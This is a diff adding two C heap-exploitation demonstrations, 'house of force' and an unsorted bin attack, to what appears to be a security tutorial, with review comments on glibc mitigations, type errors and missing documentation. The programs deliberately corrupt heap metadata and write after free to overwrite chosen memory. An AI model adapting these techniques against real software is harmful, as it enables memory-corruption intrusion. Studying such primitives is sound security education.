update 3.3.7
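--- a/src/Others/3.3.5_heap_exploit/house_of_force.c
+++ b/src/Others/3.3.5_heap_exploit/house_of_force.c
@@ -0,0 +1,39 @@
+#include <stdio.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <malloc.h>
+
+char bss_var[] = "This is a string that we want to overwrite.";
+
+int main() {
+fprintf(stderr, "We will overwrite a variable at %p\n\n", bss_var);
+
+intptr_t *p1 = malloc(0x10);
+int real_size = malloc_usable_size(p1);
+memset(p1, 'A', real_size);
+fprintf(stderr, "Let's allocate the first chunk of 0x10 bytes: %p.\n", p1);
+fprintf(stderr, "Real size of our allocated chunk is 0x%x.\n\n", real_size);
+
+intptr_t *ptr_top = (intptr_t *) ((char *)p1 + real_size);
+fprintf(stderr, "Overwriting the top chunk size with a big value so the malloc will never call mmap.\n");
+fprintf(stderr, "Old size of top chunk: %#llx\n", *((unsigned long long int *)ptr_top));
+ptr_top[0] = -1;
+fprintf(stderr, "New size of top chunk: %#llx\n", *((unsigned long long int *)ptr_top));
+
+unsigned long evil_size = (unsigned long)bss_var - sizeof(long)*2 - (unsigned long)ptr_top;
+fprintf(stderr, "\nThe value we want to write to at %p, and the top chunk is at %p, so accounting for the header size, we will malloc %#lx bytes.\n", bss_var, ptr_top, evil_size);
+void *new_ptr = malloc(evil_size);
+int real_size_new = malloc_usable_size(new_ptr);
+memset((char *)new_ptr + real_size_new - 0x20, 'A', 0x20);
+fprintf(stderr, "As expected, the new pointer is at the same place as the old top chunk: %p\n", new_ptr);
+
+void* ctr_chunk = malloc(0x30);
+fprintf(stderr, "malloc(0x30) => %p!\n", ctr_chunk);
+fprintf(stderr, "\nNow, the next chunk we overwrite will point at our target buffer, so we can overwrite the value.\n");
+
+fprintf(stderr, "old string: %s\n", bss_var);
+strcpy(ctr_chunk, "YEAH!!!");
+fprintf(stderr, "new string: %s\n", bss_var);
+}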
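Review bot: The file carries no header comment stating which allocator it was written against, and the deliberate out-of-bounds store `ptr_top[0] = -1;` only produces the printed result on glibc builds that lack the top-chunk size check; glibc 2.29 and later abort with "malloc(): corrupted top size" on the following `malloc(evil_size)`. I would add a comment at the top such as `/* Demonstration only: relies on deliberate heap metadata corruption; expected to abort on glibc >= 2.29 (top-chunk size check). */` so readers know the mitigation exists and why the program may not run as described. Separately, `<stdint.h>` is included twice, and `malloc_usable_size()` returns `size_t`, so `real_size` and `real_size_new` should be `size_t` and printed with `%zx` rather than stored in `int` and printed with `%x`. Neither `malloc` result is checked before use, which matters most for `new_ptr`, since a failed oversized request would make the `memset` on the next line dereference an address derived from NULL.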
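--- a/src/Others/3.3.5_heap_exploit/unsorted_bin_attack.c
+++ b/src/Others/3.3.5_heap_exploit/unsorted_bin_attack.c
@@ -0,0 +1,20 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+int main() {
+unsigned long stack_var = 0;
+fprintf(stderr, "The target we want to rewrite on stack: %p -> %ld\n\n", &stack_var, stack_var);
+
+unsigned long *p = malloc(0x80);
+unsigned long *p1 = malloc(0x10);
+fprintf(stderr, "Now, we allocate first small chunk on the heap at: %p\n",p);
+
+free(p);
+fprintf(stderr, "We free the first chunk now. Its bk pointer point to %p\n", (void*)p[1]);
+
+p[1] = (unsigned long)(&stack_var - 2);
+fprintf(stderr, "We write it with the target address-0x10: %p\n\n", (void*)p[1]);
+
+malloc(0x80);
+fprintf(stderr, "Let's malloc again to get the chunk we just free: %p -> %p\n", &stack_var, (void*)stack_var);
+}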
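Review bot: `p1` is allocated and never used, and nothing says why; it presumably exists so that the freed 0x80 chunk is not merged back into the top chunk, which deserves a comment like `/* guard chunk: keeps p from consolidating with top on free */`. The file also does not state its allocator assumptions: with tcache enabled (glibc 2.26 and later) a 0x80-byte request is cached per thread on `free(p)` rather than placed in the unsorted bin, and glibc 2.29 added integrity checks on the unsorted list, so the printed result is only reproducible on older glibc; a header comment should say this and note that the read and write through `p` after `free(p)` are deliberate use-after-free. Minor: `stack_var` is `unsigned long` but is printed with `%ld` in the first `fprintf`; `%lu` matches the type.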